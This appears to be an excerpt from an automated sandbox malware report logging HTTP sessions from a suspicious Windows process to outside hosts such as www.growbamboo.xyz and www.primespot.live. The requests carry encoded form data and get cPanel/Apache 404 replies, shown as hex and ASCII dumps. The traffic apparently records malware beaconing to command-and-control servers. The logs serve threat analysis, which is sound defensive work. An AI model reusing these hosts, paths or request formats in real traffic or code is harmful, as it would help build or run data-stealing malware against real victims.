                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4c 6a 39 30 6d 49 67 56 32 36 46 50 55 78 36 65 33 75 55 6b 45 69 76 31 6c 4a 75 36 69 64 4a 53 33 34 75 6c 6e 61 4a 49 57 75 39 70 77 75 76 6a 73 51 70 46 43 6e 45 34 6b 57 5a 55 4c 51 5a 30 56 38 78 31 35 47 67 47 6f 32 4b 77 4d 30 35 56 72 41 54 53 33 47 42 66 75 32 59 52 6f 53 30 54 41 48 72 39 30 33 73 57 69 67 45 75 69 6b 7a 72 39 39 55 4c 33 79 4d 67 5a 51 75 30 54 75 4e 69 41 54 79 45 4a 59 4f 78 6e 2f 71 2b 74 30 57 55 4b 71 6d 55 34 44 72 38 4c 42 41 51 6e 47 6d 55 2f 76 67 66 35 37 42 58 34 41 54 77 6c 36 50 66 66 67 4b 34 68 69 44 63 32 43 73 36 62 4d 79 35 6b 52 74 34 49 49 33 6c 37 33 36 73 68 69 47 48 43 33 6f 35 42 70 68 63 75 4a 59 51 37 39 56 49 6a 2b 4e 59 61 4e 4e 49 6d 58 4f 55 4f 6f 4d 57 61 76 71 48 74 33 64 4e 4f 47 41 4a 75 6d 44 7a 68 77 47 4a 39 6d 48 43 55 35 56 52 52 4d 30 43 4a 4a 2b 6d 5a 2b 48 79 4c 4f 30 70 52 36 68 76 5a 38 32 6b 45 69 4c 7a 46 6b 63 2b 45 7a 34 32 6d 47 4b 70 7a 31 4f 4b 45 74 76 35 77 79 46 65 6f 64 4e 65 63 78 67 33 43 32 43 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=Lj90mIgV26FPUx6e3uUkEiv1lJu6idJS34ulnaJIWu9pwuvjsQpFCnE4kWZULQZ0V8x15GgGo2KwM05VrATS3GBfu2YRoS0TAHr903sWigEuikzr99UL3yMgZQu0TuNiATyEJYOxn/q+t0WUKqmU4Dr8LBAQnGmU/vgf57BX4ATwl6PffgK4hiDc2Cs6bMy5kRt4II3l736shiGHC3o5BphcuJYQ79VIj+NYaNNImXOUOoMWavqHt3dNOGAJumDzhwGJ9mHCU5VRRM0CJJ+mZ+HyLO0pR6hvZ82kEiLzFkc+Ez42mGKpz1OKEtv5wyFeodNecxg3C2ChUASoMvfWM1+4qC7wrLGdugjJ7uyVaUbcUomx/xoO5J7qRYsHgW58AxhwUUv1mhlHVgI461lto+ZDQ20phNaaqBWfYuc+e9ffyYjLCeiqMVI9BAFgLmbC46XP14uUTxfvEvZTDTb9OGvQ0OMyYgVXoTO6V5YhLECejhV0X75PVUeTk3l0lEh2HTjBoq9ww9FOMfJ2C4DZY3iZ5qYEoJkwUc6RGzbpuOqH6HfChGs1Vr1+2QQwPWWF0CQDStTLevtTg3jUdfuKxp7ssoaD7ILsoES2qdIPbLtTJTJMAtbliZ++He3tsiBMPYWqjWgCxMtyXzropm7xFxMUgqvW9TpXv5nYGSRltz/oT4Teu0YvxQBKPf0X7gJXWFI1AZAe+6WVrjoCRvVBT9D2kot1XOKBJHrYggQP9fAwOTQDzCbSHCVsYNeZi6M6PVx8t6pdVRs0jWhUhsfWMyPCuzJX1+/xC8CtHrLrWg2OPADKkHpcMqpnW1AWlOxXVBvyrB6XgrVOTUvTQrzLASQB/1XuJaf6q3Sby5NX2sSfT/iAiShMCDpdDFQlAw5L+NYUxi3l8JX5WvF/reRa4zHEn8G4+m80X0QVx+t7kM5HkeObvCoPrcFiK3v1puuv2BTkkz7awxwttoK3Zdk5/MU5H3dnjOjAyH4IIsJhy0ps9 [TRUNCATED]
                                                                                  Dec 12, 2024 00:19:55.398338079 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:55 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:55.398406982 CET224INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                                                                  Dec 12, 2024 00:19:55.398417950 CET1236INData Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65
                                                                                  Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF; }
                                                                                  Dec 12, 2024 00:19:55.398570061 CET1236INData Raw: 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b
                                                                                  Data Ascii: reak: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { te
                                                                                  Dec 12, 2024 00:19:55.398581028 CET1236INData Raw: 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0a 20 20 20 20 20 20
                                                                                  Data Ascii: margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px;
                                                                                  Dec 12, 2024 00:19:55.398802996 CET1236INData Raw: 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64
                                                                                  Data Ascii: RFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI
                                                                                  Dec 12, 2024 00:19:55.398821115 CET1236INData Raw: 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f
                                                                                  Data Ascii: K0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpC
                                                                                  Dec 12, 2024 00:19:55.398832083 CET552INData Raw: 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52
                                                                                  Data Ascii: HvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrsty
                                                                                  Dec 12, 2024 00:19:55.398842096 CET1236INData Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                                                                                  Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
                                                                                  Dec 12, 2024 00:19:55.398852110 CET1061INData Raw: 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: ="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.549951173.208.249.155805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:56.886972904 CET505OUTGET /1h7d/?LDVlCz=GhVUl+BMvYJ5ZB/G+p82cySXkvn+9vYw5d6SxNhFTeZQzODCqlJRcn8j1xBkKA1XTq1Cn2kO8HKqHDF15Seo3gBfn1d442lRHkqyo3MG/ycD+W3sgPB+1QYdeAS4c5YMDQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:19:58.044935942 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:57 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:58.045036077 CET1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                                                                  Dec 12, 2024 00:19:58.045053959 CET1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                                                                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                                                                  Dec 12, 2024 00:19:58.045278072 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                                                                  Dec 12, 2024 00:19:58.045295000 CET1236INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                                                                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                                                                  Dec 12, 2024 00:19:58.045310974 CET1236INData Raw: 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b 34 5a 50 70 35 71 68 35 43 70 34 56 46 69 4c 38
                                                                                  Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                                                                  Dec 12, 2024 00:19:58.045331001 CET776INData Raw: 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f 34 76 6f 63 36 72 5a 6b 41 33 42 70 76 33 6e 6a 66 53 2f 6e 68 52 37 38 31 45 35 34 4e 36 74 34 4f 65 57 78 51 78 75 6b 6e
                                                                                  Data Ascii: DBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5Sf
                                                                                  Dec 12, 2024 00:19:58.045689106 CET1236INData Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                                                                                  Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
                                                                                  Dec 12, 2024 00:19:58.045814991 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 0d 0a 31 61 63 0d 0a 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67
                                                                                  Data Ascii: <p class="reason-text">1acThe server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items">
                                                                                  Dec 12, 2024 00:19:58.045830011 CET161INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 20 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20
                                                                                  Data Ascii: <div class="copyright">Copyright 2016 cPanel, Inc.</div> </a> </div> </footer> </body></html>0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.549967209.74.79.42805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:03.762929916 CET758OUTPOST /icu6/ HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.primespot.live
                                                                                  Referer: http://www.primespot.live/icu6/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 32 34 65 77 61 43 32 49 32 50 31 7a 63 63 69 4f 57 4e 6a 76 62 48 52 51 59 42 59 6d 2f 56 63 71 7a 6b 78 73 54 52 51 46 73 41 4e 79 62 6c 51 41 34 53 47 30 67 78 6f 6f 73 73 72 31 65 4e 76 77 36 64 71 53 71 58 79 67 43 49 72 47 4d 53 58 31 52 79 36 52 42 6a 64 78 73 58 63 30 69 49 62 4c 58 78 58 51 47 63 36 33 69 70 6b 75 5a 47 4f 44 35 75 73 72 55 69 34 52 77 73 62 45 6a 47 79 57 45 43 51 2f 73 6c 71 32 35 6d 73 4b 6d 70 70 66 68 5a 70 4f 55 38 5a 5a 4b 54 78 2f 4f 76 75 52 6f 48 4a 70 47 55 4e 4a 30 4a 2b 44 69 73 73 57 72 43 67 4a 57 45 47 42 69 36 35 45 2b 79 71 52 33 4b 33 49 73 4e 51 3d
                                                                                  Data Ascii: LDVlCz=24ewaC2I2P1zcciOWNjvbHRQYBYm/VcqzkxsTRQFsANyblQA4SG0gxoossr1eNvw6dqSqXygCIrGMSX1Ry6RBjdxsXc0iIbLXxXQGc63ipkuZGOD5usrUi4RwsbEjGyWECQ/slq25msKmppfhZpOU8ZZKTx/OvuRoHJpGUNJ0J+DissWrCgJWEGBi65E+yqR3K3IsNQ=
                                                                                  Dec 12, 2024 00:20:04.992533922 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:20:04 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.549974209.74.79.42805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:20:06.429075003 CET778OUTPOST /icu6/ HTTP/1.1
                                                                                  Host: www.primespot.live
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.primespot.live
                                                                                  Referer: http://www.primespot.live/icu6/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
